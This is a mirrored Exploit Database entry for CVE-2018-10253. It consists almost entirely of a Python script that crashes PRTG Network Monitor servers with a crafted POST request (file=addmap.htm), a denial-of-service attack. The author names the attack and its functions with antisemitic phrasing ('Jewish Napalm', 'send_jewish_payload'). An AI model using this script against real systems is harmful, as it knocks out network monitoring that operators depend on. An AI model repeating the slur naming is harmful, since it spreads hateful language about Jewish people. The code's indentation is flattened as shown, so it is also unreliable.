PRTG Network Monitor < 18.1.39.1648 - Stack Overflow (Denial of Service)

• Exploit Database
• 14 阅读

• 作者： luriel
  日期： 2018-04-23
• 类别：

  • dos
  平台：

  • windows_x86
• 来源：https://www.exploit-db.com/exploits/44500/

• # Exploit Title: PRTG 18.1.39.1648 - Stack Overflow
  # Date: 2018-04-21
  # Exploit Author: Lucas "luriel" Carmo
  # Vendor Homepage: https://www.paessler.com/prtg
  # Software Link: https://www.paessler.com/download/prtg-download
  # Version: 18.1.39.1648
  # CVE : CVE-2018-10253
  # Post Reference: https://medium.com/stolabs/stack-overflow-jewish-napalm-on-prtg-network-monitoring-56609b0804c5
  # http://www.roothc.com.br/stack-overflow-prtg-network-monitoring-jewish-napalm/
  
  #!/usr/bin/python
  
  import requests
  import sys
  import os
  import re
  import socket
  
  green = "\033[1;32m"
  yellow = '\033[1;33m'
  normal = '\033[0;0m'
  banner = """
   ██╗███████╗██╗██╗██╗███████╗██╗██╗███╗ ██╗ █████╗ ██████╗█████╗ ██╗ ███╗ ███╗
   ██║██╔════╝██║██║██║██╔════╝██║██║████╗██║██╔══██╗██╔══██╗██╔══██╗██║ ████╗ ████║
   ██║█████╗██║ █╗ ██║██║███████╗███████║██╔██╗ ██║███████║██████╔╝███████║██║ ██╔████╔██║
  ██ ██║██╔══╝██║███╗██║██║╚════██║██╔══██║██║╚██╗██║██╔══██║██╔═══╝ ██╔══██║██║ ██║╚██╔╝██║
  ╚█████╔╝███████╗╚███╔███╔╝██║███████║██║██║██║ ╚████║██║██║██║ ██║██║███████╗██║ ╚═╝ ██║
   ╚════╝ ╚══════╝ ╚══╝╚══╝ ╚═╝╚══════╝╚═╝╚═╝╚═╝╚═══╝╚═╝╚═╝╚═╝ ╚═╝╚═╝╚══════╝╚═╝ ╚═╝
  """
  
  
  banner2 = """
  Author: @Lucas "luriel" Carmo
  """
  
  os.system('clear')
  
  print(green+banner)
  print(yellow+banner2)
  print(normal)
  
  def check_http(url):
  pattern = re.compile("http://")
  return re.search(pattern, url)
  
  def sanitize_url(url):
  if(not check_http(url)):
  return "http://" + url
  return url
  
  def check_server(url):
  r = requests.get(url, timeout=4)
  code = r.status_code
  
  def send_jewish_payload(url):
  payload = {'file':'addmap.htm'}
  r = requests.post(url, params=payload)
  
  def main():
  try:
  if len(sys.argv) <= 3 and len (sys.argv) >= 2:
  try:
  url = sanitize_url(sys.argv[1])
  print(' [#] LOADING!')
  if (check_server(url) != 404):
  send_jewish_payload(url)
  else:
  print(' [!] Server shutdown or not found')
  except requests.exceptions.ConnectionError:
  print(' [~] BOOOOOM! PRTG Server has been exploded!')
  except requests.exceptions.InvalidURL:
  print(' [!] Invalid URL')
  except requests.exceptions.Timeout:
  print(' [!] Connection Timeout\n')
  else:
  print('Example usage: ./'+sys.argv[0]+' http://192.168.0.10/index.htm')
  except KeyboardInterrupt:
  print(' [!] Jewish Napalm Canceled;.....[./]')
  if __name__ == '__main__':
  main()